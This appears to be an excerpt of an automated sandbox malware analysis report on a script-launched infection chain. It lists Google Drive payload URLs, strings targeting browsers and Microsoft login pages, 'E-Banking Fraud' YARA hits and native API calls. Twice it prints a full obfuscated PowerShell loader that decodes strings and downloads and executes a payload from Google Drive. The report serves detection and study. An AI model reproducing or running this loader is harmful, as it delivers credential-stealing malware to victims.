              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5c
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5cc
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccU
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUz
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzP
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6E
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ER
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERG
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGr
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrO
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOq
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqC
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4s
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sK
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKq
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqR
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRg
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9U
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw6
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw68
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5F362000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684P
              Source: powershell.exe, 00000009.00000002.1916265000.00000000049B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684XRElp
              Source: msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2247826240.000000001EF20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a
              Source: msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-aUy
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
              Source: msiexec.exe, 0000000D.00000003.2129328240.0000000003F55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235504620.0000000003F5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2129402471.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2037978794.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/1~
              Source: msiexec.exe, 0000000D.00000003.2129328240.0000000003F55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235504620.0000000003F5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2129402471.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2037978794.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/J
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E158000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Gfx5ccUzPq6ERGrOqCK4sKqRgy9Uw684&export=download
              Source: msiexec.exe, 0000000D.00000003.2129328240.0000000003F55000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235504620.0000000003F5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2129402471.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2037978794.0000000003F58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a&export=download
              Source: msiexec.exe, 0000000D.00000002.2235388323.0000000003EEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a&export=downloade
              Source: msiexec.exe, 0000000D.00000003.2129654371.0000000003F45000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2235455301.0000000003F45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1KH0ZuYyqx1bCQft_dTfkqmFf35e2u1-a&export=downloady
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5DDD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033_
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: findstr.exe, 00000010.00000002.2572965729.00000000008AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
              Source: findstr.exe, 00000010.00000003.2421222581.0000000007840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
              Source: powershell.exe, 00000004.00000002.1561855307.0000022E6DC24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: findstr.exe, 00000010.00000002.2576008459.000000000786D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
              Source: powershell.exe, 00000004.00000002.1533792985.0000022E5E04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E032000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1533792985.0000022E5E04A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.1984667281.0000000003F9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 63344 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 63343 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63344
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63343
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.5:63343 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.5:63344 version: TLS 1.2

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0000000E.00000002.2574460468.0000000004740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2572546102.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2573699435.0000000000DF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2574018901.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2249260744.0000000021BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2248575840.000000001F830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.2573960761.0000000000A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Source: amsi64_1488.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: amsi32_7704.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 1488, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 7704, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZoo
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Sirupperne; function Rundingers($Frygtet){$Totalafholdsmndenes=4;do{$Utopographer+=$Frygtet[$Totalafholdsmndenes];$Totalafholdsmndenes+=5;$Floss=Format-List} until(!$Frygtet[$Totalafholdsmndenes])$Utopographer}function Exaltative($Skriv){ .($Monoprionidian) ($Skriv)}$Gylpenes=Rundingers ',endNMed E RaaTBrug.fronw';$Gylpenes+=Rundingers 'Timee ,rsbLderCLng lTranI AsseP stN Envt';$Gensidige=Rundingers 'D ciM BidoBiblz FriiE.ecl La.l Fera ha /';$Turf=Rundingers 'bjniTBaldl dogsLand1Ecty2';$Dopingens='Rens[C ten P oe ddatPrea. B,dSTopdER harPhilV haIServCTidseMantpAlano.ervi ndiNRebetAbdimHallas,emn OvoaHis.gAr.iE VikR.wel]Heat: Nem:unshsVerseReklcDe.ruSkonR,edsIChazTexscYBritP r.vrthumOFla t GitoAnaucGlobOAfkol,ept=inte$Su,ktspa.uSkrmrlockF';$Gensidige+=Rundingers 'Beha5Fold. Ste0,ive fors(AktiW estiUdflnDoktdSansoUndsw apas Til AfklN He TSyne Vejn1Dist0Neos.Deka0Li j; Ret KlebWPupiiEloknYayb6F uo4Mark;Tart m.ttxSpor6Loc 4Vite;U do Lystr Sa,vLab,:Prod1Come3Mant4Ra e.Bomb0sani)En a Leg G KaveUb,tcAngrk Insopor./.rea2Macr0Str,1U,de0Supe0Zinc1Yach0Bred1alab R tFTikhiHurtr riheNordf ongoLastxLgtn/H,pn1S.rp3Unde4Urin.Grad0';$Mellemtekst=Rundingers 'freuu nisDaraeSuper S.l-UdslAimprG DisE KronNoniT';$Afskrabede=Rundingers 'Per.hKbintK,ittpolipAn esH,nd:Band/Opda/Pawkd SkarTraniAporv ampeElem.kpengResto eneo kokgeaenlSporeNonf.CopucKer oResemPre /DepiuRececpret?SkaaeSym,xBugbp OraoAdvorBakstHect= L.sdSc ooS xewGenen Ab lUpstoVagiaRed dPaup&Kvi iPsaldMiss= Dag1 BedGFlakfbourxS re5Antac ,rucSt gU Da.z RicPChr qArc 6H peETra R.kviGVallr UnfOKortqTeknCSnitKEnsi4 AnasR gnKIrefqRverR Ulig AfgyFlaa9KalkUEmu w t,r6Bixb8Hjor4';$Pyrotoxin=Rundingers ' Gas>';$Monoprionidian=Rundingers ' debITheoE fo,X';$Underbevelling='Hestestutterier';$Thyrostraca='\Linieskifte.Rig';Exaltative (Rundingers ' S.j$chemgKroplInciOraspBSadeASg.nlIm.r: PendMisteSkrinUnsyU AbsdSietiUncoNBrinGMagn=.mpr$ AdveBregnAjugvS or:Sek aFlamp Genp urgdLystaElecT .araTing+Loch$MusitDik,H BufYSp dRSterORigtSBreftDrt RDelfAI ric ad.a');Exaltative (Rundingers ' for$ atugByggL pulOTil BS riAFroklcit :,abaD arpOYau.mGenaiLsn,N oiniB ctkGelda ,liNSys s m fkPusheFl v=Hexa$Vap aK llfSmaaSRu dKSjleRJazzAUnlyBHoveEkonfdTilsetric.SekssAd,lPStilLRotuiMelaTa,ti(Bejl$NevyPMarkY lacRStero UgetD leo BalxMutai U cndelt)');Exaltative (Rundingers $Dopingens);$Afskrabede=$Dominikanske[0];$tobiser=(Rundingers 'di,t$LandGReseLArchoIsaaBImp AAlarLF ee: OutaSpi H ilfMboelE,koldOlefS Inv=ChaiNTackE OrdWjg r- EuaodegrB SolJFykeECleaCjdertArki P ess nnoY.ktas hotFaseE Vidm Gl .Cum $murpgKlu YGaloLBaluPgenseSystNFor eTaros');Exaltative ($tobiser);Exaltative (Rundingers ' .ng$ mea s ihNajem Le eUdvedBoulsMa.r.DisiHS rae U gaFlatdRes eindtr StosSolm[Pasc$ Di MTekneUnrel Scrl Re eObelmGodst Ch.e Hypk PresUndetC jo] Ada=Hold$BowlGSvejeAbonn .ers W.tiRaindProji JusgMidde');$Siwash=Rundingers 'Prv,$V,ssaZooJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2DF0 NtQuerySystemInformation,LdrInitializeThunk,13_2_1FAC2DF0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2C70 NtFreeVirtualMemory,LdrInitializeThunk,13_2_1FAC2C70
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC35C0 NtCreateMutant,LdrInitializeThunk,13_2_1FAC35C0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2FA0 NtQuerySection,13_2_1FAC2FA0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2FB0 NtResumeThread,13_2_1FAC2FB0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2F90 NtProtectVirtualMemory,13_2_1FAC2F90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2FE0 NtCreateFile,13_2_1FAC2FE0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_1FAC2F30 NtCreateSection,13_2_1FAC2F30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E94340 NtSetContextThread,LdrInitializeThunk,16_2_02E94340
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E94650 NtSuspendThread,LdrInitializeThunk,16_2_02E94650
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E935C0 NtCreateMutant,LdrInitializeThunk,16_2_02E935C0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92AF0 NtWriteFile,LdrInitializeThunk,16_2_02E92AF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92AD0 NtReadFile,LdrInitializeThunk,16_2_02E92AD0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92B60 NtClose,LdrInitializeThunk,16_2_02E92B60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E939B0 NtGetContextThread,LdrInitializeThunk,16_2_02E939B0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92EE0 NtQueueApcThread,LdrInitializeThunk,16_2_02E92EE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92FE0 NtCreateFile,LdrInitializeThunk,16_2_02E92FE0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92FB0 NtResumeThread,LdrInitializeThunk,16_2_02E92FB0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92F30 NtCreateSection,LdrInitializeThunk,16_2_02E92F30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_02E92CA0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92C60 NtCreateKey,LdrInitializeThunk,16_2_02E92C60
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02E92C70
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_02E92DF0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92DD0 NtDelayExecution,LdrInitializeThunk,16_2_02E92DD0
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_02E92D30
              Source: C:\Windows\SysWOW64\findstr.exeCode function: 16_2_02E92D10 NtMapViewOfSection,LdrInitializeThunk,16_2_02E92D10
